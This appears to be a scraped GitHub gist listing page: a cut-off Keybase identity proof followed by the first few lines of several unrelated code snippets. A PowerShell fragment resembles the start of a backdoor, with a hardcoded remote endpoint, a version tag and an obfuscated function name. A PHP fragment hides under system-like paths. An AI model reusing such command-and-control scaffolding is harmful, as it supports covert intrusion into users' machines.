I hereby claim:
- I am jetstreamin on github.
- I am dysk0n3kt (https://keybase.io/dysk0n3kt) on keybase.
- I have a public key ASAx8H2rgt-74CDv7SGAuwcWvbA67ooI0WNLhIl6_UHMPwo
To claim this, I am signing this object:
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path; | |
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString(); | |
$EndPointURL = "http://api.private-chatting.com/connect"; | |
$__Version__ = "M_37"; | |
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString(); | |
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle); | |
function XF3a8JO3r5r8G([string] $str) { | |
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%") | |
} |
package main | |
import ( | |
"fmt" | |
"io" | |
"log" | |
"net" | |
"net/http" | |
"runtime" | |
"sync/atomic" |
<?php | |
chdir("/opt/systemd/linux2"); | |
$handle = fopen("/tmp/.linux.git_lock", "a"); | |
while (!flock($handle, LOCK_EX | LOCK_NB)) { | |
printf("Waiting for the lock...\n"); | |
sleep(1); | |
} | |
function ca($str) |
import ( | |
"bytes" | |
"encoding/base64" | |
"encoding/binary" | |
"fmt" | |
"strconv" | |
) | |
func UnpackInlineMessageId(inlineMessageId string) (int64, int64, int64, int64, error) { | |
bs, err := base64.RawURLEncoding.DecodeString(inlineMessageId) |
/* Лол, код из архива - файл датируется 2017 годом. | |
Написан был после недели изучения C++. | |
Реализует серверную часть чата на клиенте. | |
Код не полный, писался на скорую руку - так сказать proof of concept. | |
О, и да - семафоры это круто :3 */ | |
#include <iostream> | |
#include <string> | |
#include <stdio.h> | |
#include <cstring> | |
#include <stdlib.h> |
from httpx import AsyncClient | |
class SpotifyUser: | |
authorize_url = "https://accounts.spotify.com/authorize" | |
token_url = "https://accounts.spotify.com/api/token" | |
def __init__(self, client_id, client_secret, redirect_uri): | |
self.client_id = client_id | |
self.client_secret = client_secret |
using System; | |
using System.Net; | |
using System.Text; | |
using System.IO; | |
using System.Collections; | |
using System.Net.Http; | |
using System.Threading.Tasks; | |
using System.Text.Json.Serialization; | |
using System.Text.Json; |
// SPDX-License-Identifier: GPL-2.0 | |
/* | |
* @author Ammar Faizi <[email protected]> https://www.facebook.com/ammarfaizi2 | |
* @license GPL-2.0 | |
* @package tgvisd::Main::Preload | |
* | |
* Copyright (C) 2021 Ammar Faizi <[email protected]> | |
*/ | |
#if defined(__linux__) |
I hereby claim:
To claim this, I am signing this object: